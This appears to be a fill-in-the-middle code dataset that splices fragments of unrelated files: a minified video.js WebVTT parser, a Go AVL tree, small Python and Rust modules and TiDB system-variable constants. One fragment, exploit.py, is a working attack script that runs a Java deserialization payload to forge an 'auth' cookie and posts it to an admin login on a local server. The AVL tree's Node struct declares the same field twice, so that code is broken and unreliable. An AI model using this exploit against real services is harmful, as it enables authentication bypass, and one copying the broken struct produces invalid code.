259,65260,65261,65262,65263,65264,65265,65266,65267,65268,65269,65270,65271,65272,65273,65274,65275,65276,67584,67585,67586,67587,67588,67589,67592,67594,67595,67596,67597,67598,67599,67600,67601,67602,67603,67604,67605,67606,67607,67608,67609,67610,67611,67612,67613,67614,67615,67616,67617,67618,67619,67620,67621,67622,67623,67624,67625,67626,67627,67628,67629,67630,67631,67632,67633,67634,67635,67636,67637,67639,67640,67644,67647,67648,67649,67650,67651,67652,67653,67654,67655,67656,67657,67658,67659,67660,67661,67662,67663,67664,67665,67666,67667,67668,67669,67671,67672,67673,67674,67675,67676,67677,67678,67679,67840,67841,67842,67843,67844,67845,67846,67847,67848,67849,67850,67851,67852,67853,67854,67855,67856,67857,67858,67859,67860,67861,67862,67863,67864,67865,67866,67867,67872,67873,67874,67875,67876,67877,67878,67879,67880,67881,67882,67883,67884,67885,67886,67887,67888,67889,67890,67891,67892,67893,67894,67895,67896,67897,67903,67968,67969,67970,67971,67972,67973,67974,67975,67976,67977,67978,67979,67980,67981,67982,67983,67984,67985,67986,67987,67988,67989,67990,67991,67992,67993,67994,67995,67996,67997,67998,67999,68e3,68001,68002,68003,68004,68005,68006,68007,68008,68009,68010,68011,68012,68013,68014,68015,68016,68017,68018,68019,68020,68021,68022,68023,68030,68031,68096,68112,68113,68114,68115,68117,68118,68119,68121,68122,68123,68124,68125,68126,68127,68128,68129,68130,68131,68132,68133,68134,68135,68136,68137,68138,68139,68140,68141,68142,68143,68144,68145,68146,68147,68160,68161,68162,68163,68164,68165,68166,68167,68176,68177,68178,68179,68180,68181,68182,68183,68184,68192,68193,68194,68195,68196,68197,68198,68199,68200,68201,68202,68203,68204,68205,68206,68207,68208,68209,68210,68211,68212,68213,68214,68215,68216,68217,68218,68219,68220,68221,68222,68223,68352,68353,68354,68355,68356,68357,68358,68359,68360,68361,68362,68363,68364,68365,68366,68367,68368,68369,68370,68371,68372,68373,68374,68375,68376,68377,68378,68379,68380,68381,68382,68383,68384,68385,68386,68387,68388,68389,68390,68391,68392,68393,68394,68395,68396,68397,68398,68399,68400,68401,68402,68403,68404,68405,68416,68417,68418,68419,68420,68421,68422,68423,68424,68425,68426,68427,68428,68429,68430,68431,68432,68433,68434,68435,68436,68437,68440,68441,68442,68443,68444,68445,68446,68447,68448,68449,68450,68451,68452,68453,68454,68455,68456,68457,68458,68459,68460,68461,68462,68463,68464,68465,68466,68472,68473,68474,68475,68476,68477,68478,68479,68608,68609,68610,68611,68612,68613,68614,68615,68616,68617,68618,68619,68620,68621,68622,68623,68624,68625,68626,68627,68628,68629,68630,68631,68632,68633,68634,68635,68636,68637,68638,68639,68640,68641,68642,68643,68644,68645,68646,68647,68648,68649,68650,68651,68652,68653,68654,68655,68656,68657,68658,68659,68660,68661,68662,68663,68664,68665,68666,68667,68668,68669,68670,68671,68672,68673,68674,68675,68676,68677,68678,68679,68680,126464,126465,126466,126467,126469,126470,126471,126472,126473,126474,126475,126476,126477,126478,126479,126480,126481,126482,126483,126484,126485,126486,126487,126488,126489,126490,126491,126492,126493,126494,126495,126497,126498,126500,126503,126505,126506,126507,126508,126509,126510,126511,126512,126513,126514,126516,126517,126518,126519,126521,126523,126530,126535,126537,126539,126541,126542,126543,126545,126546,126548,126551,126553,126555,126557,126559,126561,126562,126564,126567,126568,126569,126570,126572,126573,126574,126575,126576,126577,126578,126580,126581,126582,126583,126585,126586,126587,126588,126590,126592,126593,126594,1265
95,126596,126597,126598,126599,126600,126601,126603,126604,126605,126606,126607,126608,126609,126610,126611,126612,126613,126614,126615,126616,126617,126618,126619,126625,126626,126627,126629,126630,126631,126632,126633,126635,126636,126637,126638,126639,126640,126641,126642,126643,126644,126645,126646,126647,126648,126649,126650,126651,1114109];
j.prototype.applyStyles=function(a,b){b=b||this.div;for(var c in a)a.hasOwnProperty(c)&&(b.style[c]=a[c])},j.prototype.formatStyle=function(a,b){return 0===a?0:a+b},k.prototype=o(j.prototype),k.prototype.constructor=k,l.prototype.move=function(a,b){switch(b=void 0!==b?b:this.lineHeight,a){case"+x":this.left+=b,this.right+=b;break;case"-x":this.left-=b,this.right-=b;break;case"+y":this.top+=b,this.bottom+=b;break;case"-y":this.top-=b,this.bottom-=b}},l.prototype.overlaps=function(a){return this.left<a.right&&this.right>a.left&&this.top<a.bottom&&this.bottom>a.top},l.prototype.overlapsAny=function(a){for(var b=0;b<a.length;b++)if(this.overlaps(a[b]))return!0;return!1},l.prototype.within=function(a){return this.top>=a.top&&this.bottom<=a.bottom&&this.left>=a.left&&this.right<=a.right},l.prototype.overlapsOppositeAxis=function(a,b){switch(b){case"+x":return this.left<a.left;case"-x":return this.right>a.right;case"+y":return this.top<a.top;case"-y":return this.bottom>a.bottom}},l.prototype.intersectPercentage=function(a){var b=Math.max(0,Math.min(this.right,a.right)-Math.max(this.left,a.left)),c=Math.max(0,Math.min(this.bottom,a.bottom)-Math.max(this.top,a.top)),d=b*c;return d/(this.height*this.width)},l.prototype.toCSSCompatValues=function(a){return{top:this.top-a.top,bottom:a.bottom-this.bottom,left:this.left-a.left,right:a.right-this.right,height:this.height,width:this.width}},l.getSimpleBoxPosition=function(a){var b=a.div?a.div.offsetHeight:a.tagName?a.offsetHeight:0,c=a.div?a.div.offsetWidth:a.tagName?a.offsetWidth:0,d=a.div?a.div.offsetTop:a.tagName?a.offsetTop:0;a=a.div?a.div.getBoundingClientRect():a.tagName?a.getBoundingClientRect():a;var e={left:a.left,right:a.right,top:a.top||d,height:a.height||b,bottom:a.bottom||d+(a.height||b),width:a.width||c};return e},n.StringDecoder=function(){return{decode:function(a){if(!a)return"";if("string"!=typeof a)throw new Error("Error - expected string data.");return decodeURIComponent(encodeURIComponent(a))}}},n.convertCueToDOMTree=function(a,b){return a&&b?g(a,b):null};var u=.05,v="sans-serif",w="1.5%";n.processCues=function(a,b,c){function d(a){for(var b=0;b<a.length;b++)if(a[b].hasBeenReset||!a[b].displayState)return!0;return!1}if(!a||!b||!c)return null;for(;c.firstChild;)c.removeChild(c.firstChild);var e=a.document.createElement("div");if(e.style.position="absolute",e.style.left="0",e.style.right="0",e.style.top="0",e.style.bottom="0",e.style.margin=w,c.appendChild(e),d(b)){var f=[],g=l.getSimpleBoxPosition(e),h=Math.round(g.height*u*100)/100,i={font:h+"px "+v};!function(){for(var c,d,h=0;h<b.length;h++)d=b[h],c=new k(a,d,i),e.appendChild(c.div),m(a,c,g,f),d.displayState=c.div,f.push(l.getSimpleBoxPosition(c))}()}else for(var j=0;j<b.length;j++)e.appendChild(b[j].displayState)},n.Parser=function(a,b,c){c||(c=b,b={}),b||(b={}),this.window=a,this.vttjs=b,this.state="INITIAL",this.buffer="",this.decoder=c||new TextDecoder("utf8"),this.regionList=[]},n.Parser.prototype={reportOrThrowError:function(a){if(!(a instanceof b))throw a;this.onparsingerror&&this.onparsingerror(a)},parse:function(a){function c(){for(var a=i.buffer,b=0;b<a.length&&"\r"!==a[b]&&"\n"!==a[b];)++b;var c=a.substr(0,b);return"\r"===a[b]&&++b,"\n"===a[b]&&++b,i.buffer=a.substr(b),c}function g(a){var b=new d;if(e(a,function(a,c){switch(a){case"id":b.set(a,c);break;case"width":b.percent(a,c);break;case"lines":b.integer(a,c);break;case"regionanchor":case"viewportanchor":var e=c.split(",");if(2!==e.length)break;var f=new 
d;if(f.percent("x",e[0]),f.percent("y",e[1]),!f.has("x")||!f.has("y"))break;b.set(a+"X",f.get("x")),b.set(a+"Y",f.get("y"));break;case"scroll":b.alt(a,c,["up"])}},/=/,/\s/),b.has("id")){var c=new(i.vttjs.VTTRegion||i.window.VTTRegion);c.width=b.get("width",100),c.lines=b.get("lines",3),c.regionAnchorX=b.get("regionanchorX",0),c.regionAnchorY=b.get("regionanchorY",100),c.viewportAnchorX=b.get("viewportanchorX",0),c.viewportAnchorY=b.get("viewportanchorY",100),c.scroll=b.get("scroll",""),i.onregion&&i.onregion(c),i.regionList.push({id:b.get("id"),region:c})}}function h(a){e(a,function(a,b){switch(a){case"Region":g(b)}},/:/)}var i=this;a&&(i.buffer+=i.decoder.decode(a,{stream:!0}));try{var j;if("INITIAL"===i.state){if(!/\r\n|\n/.test(i.buffer))return this;j=c();var k=j.match(/^WEBVTT([ \t].*)?$/);if(!k||!k[0])throw new b(b.Errors.BadSignature);i.state="HEADER"}for(var l=!1;i.buffer;){if(!/\r\n|\n/.test(i.buffer))return this;switch(l?l=!1:j=c(),i.state){case"HEADER":/:/.test(j)?h(j):j||(i.state="ID");continue;case"NOTE":j||(i.state="ID");continue;case"ID":if(/^NOTE($|[ \t])/.test(j)){i.state="NOTE";break}if(!j)continue;if(i.cue=new(i.vttjs.VTTCue||i.window.VTTCue)(0,0,""),i.state="CUE",-1===j.indexOf("-->")){i.cue.id=j;continue}case"CUE":try{f(j,i.cue,i.regionList)}catch(m){i.reportOrThrowError(m),i.cue=null,i.state="BADCUE";continue}i.state="CUETEXT";continue;case"CUETEXT":var n=-1!==j.indexOf("-->");if(!j||n&&(l=!0)){i.oncue&&i.oncue(i.cue),i.cue=null,i.state="ID";continue}i.cue.text&&(i.cue.text+="\n"),i.cue.text+=j;continue;case"BADCUE":j||(i.state="ID");continue}}}catch(m){i.reportOrThrowError(m),"CUETEXT"===i.state&&i.cue&&i.oncue&&i.oncue(i.cue),i.cue=null,i.state="INITIAL"===i.state?"BADWEBVTT":"BADCUE"}return this},flush:function(){var a=this;try{if(a.buffer+=a.decoder.decode(),(a.cue||"HEADER"===a.state)&&(a.buffer+="\n\n",a.parse()),"INITIAL"===a.state)throw new b(b.Errors.BadSignature)}catch(c){a.reportOrThrowError(c)}return a.onflush&&a.onflush(),this}},a.WebVTT=n}(this,this.vttjs||{});
//# sourceMappingURL=video.min.js.map | e |
exploit.py | import requests
from subprocess import Popen, PIPE
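# console runs a shell command and returns a (returncode, stdout, stderr) tuple.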
def console(cmd):
|
console("javac exploits/JavaSerializationExploit/src/main/java/DoSerialize.java")
cookieval = console("java DoSerialize")
cookie = {'auth': cookieval[1].strip()}
r = requests.post('http://localhost:8081/admin/login', cookies=cookie, data=" ",allow_redirects=True)
print(r.text)
| p = Popen(cmd, shell=True, stdout=PIPE)
out, err = p.communicate()
return (p.returncode, out, err) |
avltree.go | // Copyright (c) 2017, Benjamin Scher Purcell. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package avltree implements an AVL balanced binary tree.
//
// Structure is not thread safe.
//
// References: https://en.wikipedia.org/wiki/AVL_tree
package avltree
import (
"fmt"
"github.com/douguohai/gods/trees"
"github.com/douguohai/gods/utils"
)
func assertTreeImplementation() {
var _ trees.Tree = new(Tree)
}
// Tree holds elements of the AVL tree.
type Tree struct {
Root *Node // Root node
Comparator utils.Comparator // Key comparator
size int // Total number of keys in the tree
}
// Node is a single element within the tree
type Node struct {
Key interface{}
Value interface{}
Parent *Node // Parent node
Children [2]*Node // Children nodes
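b int8 // hmm, see next line; this comment documents the field below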
b int8
}
// NewWith instantiates an AVL tree with the custom comparator.
func NewWith(comparator utils.Comparator) *Tree {
return &Tree{Comparator: comparator}
}
// NewWithIntComparator instantiates an AVL tree with the IntComparator, i.e. keys are of type int.
func NewWithIntComparator() *Tree {
return &Tree{Comparator: utils.IntComparator}
}
// NewWithStringComparator instantiates an AVL tree with the StringComparator, i.e. keys are of type string.
func NewWithStringComparator() *Tree {
return &Tree{Comparator: utils.StringComparator}
}
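// Example (an illustrative sketch using only methods defined in this file):
//
//	tree := NewWithIntComparator()
//	tree.Put(1, "a")
//	tree.Put(3, "b")
//	value, found := tree.Get(3) // value == "b", found == true
//	floor, ok := tree.Floor(2) // floor.Key == 1, the largest key <= 2
//	ceil, ok2 := tree.Ceiling(2) // ceil.Key == 3, the smallest key >= 2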
// Put inserts a node into the tree.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Put(key interface{}, value interface{}) {
t.put(key, value, nil, &t.Root)
}
// Get searches the node in the tree by key and returns its value or nil if key is not found in tree.
// Second return parameter is true if key was found, otherwise false.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Get(key interface{}) (value interface{}, found bool) {
n := t.Root
for n != nil {
cmp := t.Comparator(key, n.Key)
switch {
case cmp == 0:
return n.Value, true
case cmp < 0:
n = n.Children[0]
case cmp > 0:
n = n.Children[1]
}
}
return nil, false
}
// Remove removes the node from the tree by key.
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Remove(key interface{}) {
t.remove(key, &t.Root)
}
// Empty returns true if tree does not contain any nodes.
func (t *Tree) Empty() bool {
return t.size == 0
}
// Size returns the number of elements stored in the tree.
func (t *Tree) Size() int {
return t.size
}
// Keys returns all keys in-order
func (t *Tree) Keys() []interface{} {
keys := make([]interface{}, t.size)
it := t.Iterator()
for i := 0; it.Next(); i++ {
keys[i] = it.Key()
}
return keys
}
// Values returns all values in-order based on the key.
func (t *Tree) Values() []interface{} {
values := make([]interface{}, t.size)
it := t.Iterator()
for i := 0; it.Next(); i++ {
values[i] = it.Value()
}
return values
}
// Left returns the minimum element of the AVL tree
// or nil if the tree is empty.
func (t *Tree) Left() *Node {
return t.bottom(0)
}
// Right returns the maximum element of the AVL tree
// or nil if the tree is empty.
func (t *Tree) Right() *Node {
return t.bottom(1)
}
// Floor finds the floor node of the input key; it returns the floor node or nil if no floor is found.
// Second return parameter is true if floor was found, otherwise false.
//
// Floor node is defined as the largest node that is smaller than or equal to the given node.
// A floor node may not be found, either because the tree is empty, or because
// all nodes in the tree are larger than the given node.
//
// Key should adhere to the comparator's type assertion, otherwise method panics. | found = false
n := t.Root
for n != nil {
c := t.Comparator(key, n.Key)
switch {
case c == 0:
return n, true
case c < 0:
n = n.Children[0]
case c > 0:
floor, found = n, true
n = n.Children[1]
}
}
if found {
return
}
return nil, false
}
// Ceiling finds the ceiling node of the input key; it returns the ceiling node or nil if no ceiling is found.
// Second return parameter is true if ceiling was found, otherwise false.
//
// Ceiling node is defined as the smallest node that is larger than or equal to the given node.
// A ceiling node may not be found, either because the tree is empty, or because
// all nodes in the tree are smaller than the given node.
//
// Key should adhere to the comparator's type assertion, otherwise method panics.
func (t *Tree) Ceiling(key interface{}) (ceiling *Node, found bool) {
found = false
n := t.Root
for n != nil {
c := t.Comparator(key, n.Key)
switch {
case c == 0:
return n, true
case c < 0:
ceiling, found = n, true
n = n.Children[0]
case c > 0:
n = n.Children[1]
}
}
if found {
return
}
return nil, false
}
// Clear removes all nodes from the tree.
func (t *Tree) Clear() {
t.Root = nil
t.size = 0
}
// String returns a string representation of the container.
func (t *Tree) String() string {
str := "AVLTree\n"
if !t.Empty() {
output(t.Root, "", true, &str)
}
return str
}
func (n *Node) String() string {
return fmt.Sprintf("%v", n.Key)
}
func (t *Tree) put(key interface{}, value interface{}, p *Node, qp **Node) bool {
q := *qp
if q == nil {
t.size++
*qp = &Node{Key: key, Value: value, Parent: p}
return true
}
c := t.Comparator(key, q.Key)
if c == 0 {
q.Key = key
q.Value = value
return false
}
if c < 0 {
c = -1
} else {
c = 1
}
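// Map the comparison sign to a child slot: c == -1 -> Children[0] (left), c == 1 -> Children[1] (right).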
a := (c + 1) / 2
fix := t.put(key, value, q, &q.Children[a])
if fix {
return putFix(int8(c), qp)
}
return false
}
func (t *Tree) remove(key interface{}, qp **Node) bool {
q := *qp
if q == nil {
return false
}
c := t.Comparator(key, q.Key)
if c == 0 {
t.size--
if q.Children[1] == nil {
if q.Children[0] != nil {
q.Children[0].Parent = q.Parent
}
*qp = q.Children[0]
return true
}
fix := removeMin(&q.Children[1], &q.Key, &q.Value)
if fix {
return removeFix(-1, qp)
}
return false
}
if c < 0 {
c = -1
} else {
c = 1
}
a := (c + 1) / 2
fix := t.remove(key, &q.Children[a])
if fix {
return removeFix(int8(-c), qp)
}
return false
}
func removeMin(qp **Node, minKey *interface{}, minVal *interface{}) bool {
q := *qp
if q.Children[0] == nil {
*minKey = q.Key
*minVal = q.Value
if q.Children[1] != nil {
q.Children[1].Parent = q.Parent
}
*qp = q.Children[1]
return true
}
fix := removeMin(&q.Children[0], minKey, minVal)
if fix {
return removeFix(1, qp)
}
return false
}
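// putFix rebalances *t after an insertion on side c (-1 left, 1 right).
// It returns true only while the subtree may have grown taller, which tells
// the recursive put to keep fixing up balance factors along the search path.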
func putFix(c int8, t **Node) bool {
s := *t
if s.b == 0 {
s.b = c
return true
}
if s.b == -c {
s.b = 0
return false
}
if s.Children[(c+1)/2].b == c {
s = singlerot(c, s)
} else {
s = doublerot(c, s)
}
*t = s
return false
}
func removeFix(c int8, t **Node) bool {
s := *t
if s.b == 0 {
s.b = c
return false
}
if s.b == -c {
s.b = 0
return true
}
a := (c + 1) / 2
if s.Children[a].b == 0 {
s = rotate(c, s)
s.b = -c
*t = s
return false
}
if s.Children[a].b == c {
s = singlerot(c, s)
} else {
s = doublerot(c, s)
}
*t = s
return true
}
func singlerot(c int8, s *Node) *Node {
s.b = 0
s = rotate(c, s)
s.b = 0
return s
}
func doublerot(c int8, s *Node) *Node {
a := (c + 1) / 2
r := s.Children[a]
s.Children[a] = rotate(-c, s.Children[a])
p := rotate(c, s)
switch {
default:
s.b = 0
r.b = 0
case p.b == c:
s.b = -c
r.b = 0
case p.b == -c:
s.b = 0
r.b = c
}
p.b = 0
return p
}
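// rotate promotes child a = (c+1)/2 of s: c == 1 performs a left rotation
// (the right child becomes the subtree root), c == -1 a right rotation, with
// parent pointers updated accordingly.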
func rotate(c int8, s *Node) *Node {
a := (c + 1) / 2
r := s.Children[a]
s.Children[a] = r.Children[a^1]
if s.Children[a] != nil {
s.Children[a].Parent = s
}
r.Children[a^1] = s
r.Parent = s.Parent
s.Parent = r
return r
}
func (t *Tree) bottom(d int) *Node {
n := t.Root
if n == nil {
return nil
}
for c := n.Children[d]; c != nil; c = n.Children[d] {
n = c
}
return n
}
// Prev returns the previous element in an inorder
// walk of the AVL tree.
func (n *Node) Prev() *Node {
return n.walk1(0)
}
// Next returns the next element in an inorder
// walk of the AVL tree.
func (n *Node) Next() *Node {
return n.walk1(1)
}
func (n *Node) walk1(a int) *Node {
if n == nil {
return nil
}
if n.Children[a] != nil {
n = n.Children[a]
for n.Children[a^1] != nil {
n = n.Children[a^1]
}
return n
}
p := n.Parent
for p != nil && p.Children[a] == n {
n = p
p = p.Parent
}
return p
}
func output(node *Node, prefix string, isTail bool, str *string) {
if node.Children[1] != nil {
newPrefix := prefix
if isTail {
newPrefix += "│ "
} else {
newPrefix += " "
}
output(node.Children[1], newPrefix, false, str)
}
*str += prefix
if isTail {
*str += "└── "
} else {
*str += "┌── "
}
*str += node.String() + "\n"
if node.Children[0] != nil {
newPrefix := prefix
if isTail {
newPrefix += " "
} else {
newPrefix += "│ "
}
output(node.Children[0], newPrefix, true, str)
}
} | func (t *Tree) Floor(key interface{}) (floor *Node, found bool) { |
facade_abc.py | from abc import ABC
class AbcFacade(ABC):
"""Any interface will expect to be able to invoke the following methods."""
def count_rows(self):
pass | pass
def get_last_workday(self):
pass
def delete_history(self):
pass
def disconnect(self):
pass |
def get_rows(self): |
configuration.py | import yaml
from enum import Enum
class SimulationType(Enum):
explosion = "EXPLOSION"
collision = "COLLISION"
class SatType(Enum):
rb = "RB"
sat = "SC"
soc = "SOC"
deb = "DEB"
class SimulationConfiguration:
# Takes a .yaml file with simulation configurations
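# Example of a YAML document this constructor accepts (values are hypothetical, for illustration only):
#   minimalCharacteristicLength: 0.05
#   simulationType: explosion
#   satType: rb
#   massConservation: true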
def __init__(self, filePath: str):
try:
with open(filePath, 'r') as stream:
data_loaded = yaml.safe_load(stream)
self._minimalCharacteristicLength = float(
data_loaded['minimalCharacteristicLength'])
self._simulationType = SimulationType(data_loaded['simulationType'].upper())
self._sat_type = SatType(data_loaded['satType'].upper())
self._mass_conservation = bool(data_loaded['massConservation'])
except Exception as e:
print(f"Exception: {e}")
@property
def minimalCharacteristicLength(self) -> float:
return self._minimalCharacteristicLength
@property
def simulationType(self) -> SimulationType:
return self._simulationType
@property
def sat_type(self) -> SatType: | def mass_conservation(self) -> bool:
return self._mass_conservation | return self._sat_type
@property |
pages.rs | mod artist;
mod artists;
mod index;
mod player;
mod queue;
mod songs;
pub use artist::ArtistPage;
pub use artists::ArtistsPage;
pub use index::IndexPage;
pub use player::PlayerPage;
pub use queue::QueuePage;
pub use songs::SongsPage; | ||
tidb_vars.go | // Copyright 2017 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package variable
import (
"math"
"github.com/pingcap/parser/mysql"
"github.com/pingcap/tidb/config"
"github.com/uber-go/atomic"
)
/*
Steps to add a new TiDB specific system variable:
1. Add a new variable name with comment in this file.
2. Add the default value of the new variable in this file.
3. Add SysVar instance in 'defaultSysVars' slice with the default value.
4. Add a field in `SessionVars`.
5. Update the `NewSessionVars` function to set the field to its default value.
6. Update the `variable.SetSessionSystemVar` function to use the new value when SET statement is executed.
7. If it is a global variable, add it in `session.loadCommonGlobalVarsSQL`.
8. Update ValidateSetSystemVar if the variable's value need to be validated.
9. Use this variable to control the behavior in code.
*/
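// Illustrative sketch of steps 1-3 for a hypothetical variable; the name,
// default, and SysVar fields below are examples only, not part of TiDB:
//
//	// tidb_example_switch is used to enable/disable the example feature.
//	TiDBExampleSwitch = "tidb_example_switch" // step 1: declare the name
//	DefTiDBExampleSwitch = false              // step 2: declare the default
//	// step 3: register it in 'defaultSysVars', e.g.
//	// {Scope: ScopeGlobal | ScopeSession, Name: TiDBExampleSwitch,
//	//  Value: BoolToOnOff(DefTiDBExampleSwitch), Type: TypeBool}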
// TiDB system variable names that are only in session scope.
const (
TiDBDDLSlowOprThreshold = "ddl_slow_threshold"
// tidb_snapshot is used for reading history data, the default value is empty string.
// The value can be a datetime string like '2017-11-11 20:20:20' or a tso string. When this variable is set, the session reads history data of that time.
TiDBSnapshot = "tidb_snapshot"
// tidb_opt_agg_push_down is used to enable/disable the optimizer rule of aggregation push down.
TiDBOptAggPushDown = "tidb_opt_agg_push_down"
// TiDBOptBCJ is used to enable/disable broadcast join in MPP mode
TiDBOptBCJ = "tidb_opt_broadcast_join"
// TiDBOptCartesianBCJ is used to disable/enable broadcast cartesian join in MPP mode
TiDBOptCartesianBCJ = "tidb_opt_broadcast_cartesian_join"
TiDBOptMPPOuterJoinFixedBuildSide = "tidb_opt_mpp_outer_join_fixed_build_side"
// tidb_opt_distinct_agg_push_down is used to decide whether agg with distinct should be pushed to tikv/tiflash.
TiDBOptDistinctAggPushDown = "tidb_opt_distinct_agg_push_down"
// tidb_broadcast_join_threshold_size is used to limit the size of small table for mpp broadcast join.
// Its unit is bytes; if the size of the small table is larger than it, we will not use bcj.
TiDBBCJThresholdSize = "tidb_broadcast_join_threshold_size"
// tidb_broadcast_join_threshold_count is used to limit the count of small table for mpp broadcast join.
// If we can't estimate the size of one side of join child, we will check if its row number exceeds this limitation.
TiDBBCJThresholdCount = "tidb_broadcast_join_threshold_count"
// tidb_opt_write_row_id is used to enable/disable the operations of insert, replace and update to _tidb_rowid.
TiDBOptWriteRowID = "tidb_opt_write_row_id"
// Auto analyze will run if (table modify count)/(table row count) is greater than this value.
TiDBAutoAnalyzeRatio = "tidb_auto_analyze_ratio"
// Auto analyze will run if current time is within start time and end time.
TiDBAutoAnalyzeStartTime = "tidb_auto_analyze_start_time"
TiDBAutoAnalyzeEndTime = "tidb_auto_analyze_end_time"
// tidb_checksum_table_concurrency is used to speed up the ADMIN CHECKSUM TABLE
// statement, when a table has multiple indices, those indices can be
// scanned concurrently, with the cost of higher system performance impact.
TiDBChecksumTableConcurrency = "tidb_checksum_table_concurrency"
// TiDBCurrentTS is used to get the current transaction timestamp.
// It is read-only.
TiDBCurrentTS = "tidb_current_ts"
// TiDBLastTxnInfo is used to get the last transaction info within the current session.
TiDBLastTxnInfo = "tidb_last_txn_info"
// TiDBLastQueryInfo is used to get the last query info within the current session.
TiDBLastQueryInfo = "tidb_last_query_info"
// tidb_config is a read-only variable that shows the config of the current server.
TiDBConfig = "tidb_config"
// tidb_batch_insert is used to enable/disable auto-splitting of insert data. If this option is on, the insert executor will automatically
// insert data into multiple batches and use a single txn for each batch. This will be helpful when inserting large data.
TiDBBatchInsert = "tidb_batch_insert"
// tidb_batch_delete is used to enable/disable auto-splitting of delete data. If this option is on, the delete executor will automatically
// split data into multiple batches and use a single txn for each batch. This will be helpful when deleting large data.
TiDBBatchDelete = "tidb_batch_delete"
// tidb_batch_commit is used to enable/disable auto-splitting of the transaction.
// If this option is on, the transaction will be committed when it reaches stmt-count-limit, and a new transaction is started.
TiDBBatchCommit = "tidb_batch_commit"
// tidb_dml_batch_size is used to split the insert/delete data into small batches.
// It only takes effect when tidb_batch_insert/tidb_batch_delete is on.
// Its default value is 20000. When the row size is large, 20k rows could be larger than 100MB.
// User could change it to a smaller one to avoid breaking the transaction size limitation.
TiDBDMLBatchSize = "tidb_dml_batch_size"
// The following session variables control the memory quota during query execution.
// "tidb_mem_quota_query": control the memory quota of a query.
TiDBMemQuotaQuery = "tidb_mem_quota_query" // Bytes.
TiDBMemQuotaApplyCache = "tidb_mem_quota_apply_cache"
// TODO: remove them below sometime, it should have only one Quota(TiDBMemQuotaQuery).
TiDBMemQuotaHashJoin = "tidb_mem_quota_hashjoin" // Bytes.
TiDBMemQuotaMergeJoin = "tidb_mem_quota_mergejoin" // Bytes.
TiDBMemQuotaSort = "tidb_mem_quota_sort" // Bytes.
TiDBMemQuotaTopn = "tidb_mem_quota_topn" // Bytes.
TiDBMemQuotaIndexLookupReader = "tidb_mem_quota_indexlookupreader" // Bytes.
TiDBMemQuotaIndexLookupJoin = "tidb_mem_quota_indexlookupjoin" // Bytes.
// tidb_general_log is used to log every query in the server in info level.
TiDBGeneralLog = "tidb_general_log"
// tidb_pprof_sql_cpu is used to add label sql label to pprof result.
TiDBPProfSQLCPU = "tidb_pprof_sql_cpu"
// tidb_retry_limit is the maximum number of retries when committing a transaction.
TiDBRetryLimit = "tidb_retry_limit"
// tidb_disable_txn_auto_retry disables transaction auto retry.
TiDBDisableTxnAutoRetry = "tidb_disable_txn_auto_retry"
// Deprecated: tidb_enable_streaming enables TiDB to use streaming API for coprocessor requests.
TiDBEnableStreaming = "tidb_enable_streaming"
// tidb_enable_chunk_rpc enables TiDB to use Chunk format for coprocessor requests.
TiDBEnableChunkRPC = "tidb_enable_chunk_rpc"
// tidb_optimizer_selectivity_level is used to control the selectivity estimation level.
TiDBOptimizerSelectivityLevel = "tidb_optimizer_selectivity_level"
// tidb_txn_mode is used to control the transaction behavior.
TiDBTxnMode = "tidb_txn_mode"
// tidb_row_format_version is used to control the current tidb row format version.
TiDBRowFormatVersion = "tidb_row_format_version"
// tidb_enable_table_partition is used to control table partition feature.
// The valid values include auto/on/off:
// on or auto: enable table partition if the partition type is implemented.
// off: always disable table partition.
TiDBEnableTablePartition = "tidb_enable_table_partition"
// tidb_enable_list_partition is used to control list table partition feature.
TiDBEnableListTablePartition = "tidb_enable_list_partition"
// tidb_skip_isolation_level_check is used to control whether to return an error when setting an unsupported transaction
// isolation level.
TiDBSkipIsolationLevelCheck = "tidb_skip_isolation_level_check"
// TiDBLowResolutionTSO is used for reading data with low resolution TSO which is updated once every two seconds
TiDBLowResolutionTSO = "tidb_low_resolution_tso"
// TiDBReplicaRead is used for reading data from replicas, followers for example.
TiDBReplicaRead = "tidb_replica_read"
// TiDBAllowRemoveAutoInc indicates whether a user can drop the auto_increment column attribute or not.
TiDBAllowRemoveAutoInc = "tidb_allow_remove_auto_inc"
// TiDBMultiStatementMode enables multiple statements per query, at the risk of SQL injection;
// it provides backwards compatibility.
TiDBMultiStatementMode = "tidb_multi_statement_mode"
// TiDBEvolvePlanTaskMaxTime controls the max time of a single evolution task.
TiDBEvolvePlanTaskMaxTime = "tidb_evolve_plan_task_max_time"
// TiDBEvolvePlanTaskStartTime is the start time of evolution task.
TiDBEvolvePlanTaskStartTime = "tidb_evolve_plan_task_start_time"
// TiDBEvolvePlanTaskEndTime is the end time of evolution task.
TiDBEvolvePlanTaskEndTime = "tidb_evolve_plan_task_end_time"
// tidb_slow_log_threshold is used to set the slow log threshold in the server.
TiDBSlowLogThreshold = "tidb_slow_log_threshold"
// tidb_record_plan_in_slow_log is used to log the plan of the slow query.
TiDBRecordPlanInSlowLog = "tidb_record_plan_in_slow_log"
// tidb_enable_slow_log enables TiDB to log slow queries.
TiDBEnableSlowLog = "tidb_enable_slow_log"
// tidb_query_log_max_len is used to set the max length of the query in the log.
TiDBQueryLogMaxLen = "tidb_query_log_max_len"
// TiDBCheckMb4ValueInUTF8 is used to control whether to enable the check wrong utf8 value.
TiDBCheckMb4ValueInUTF8 = "tidb_check_mb4_value_in_utf8"
// TiDBFoundInPlanCache indicates whether the last statement was found in plan cache
TiDBFoundInPlanCache = "last_plan_from_cache"
// TiDBFoundInBinding indicates whether the last statement was matched with the hints in the binding.
TiDBFoundInBinding = "last_plan_from_binding"
// TiDBAllowAutoRandExplicitInsert indicates whether explicit insertion on auto_random column is allowed.
TiDBAllowAutoRandExplicitInsert = "allow_auto_random_explicit_insert"
// TiDBTxnScope indicates whether using global transactions or local transactions.
TiDBTxnScope = "txn_scope"
// TiDBTxnReadTS indicates that the next transaction should be a staleness transaction, and provides the startTS.
TiDBTxnReadTS = "tx_read_ts"
)
// TiDB system variable names that both in session and global scope.
const (
// tidb_build_stats_concurrency is used to speed up the ANALYZE statement, when a table has multiple indices,
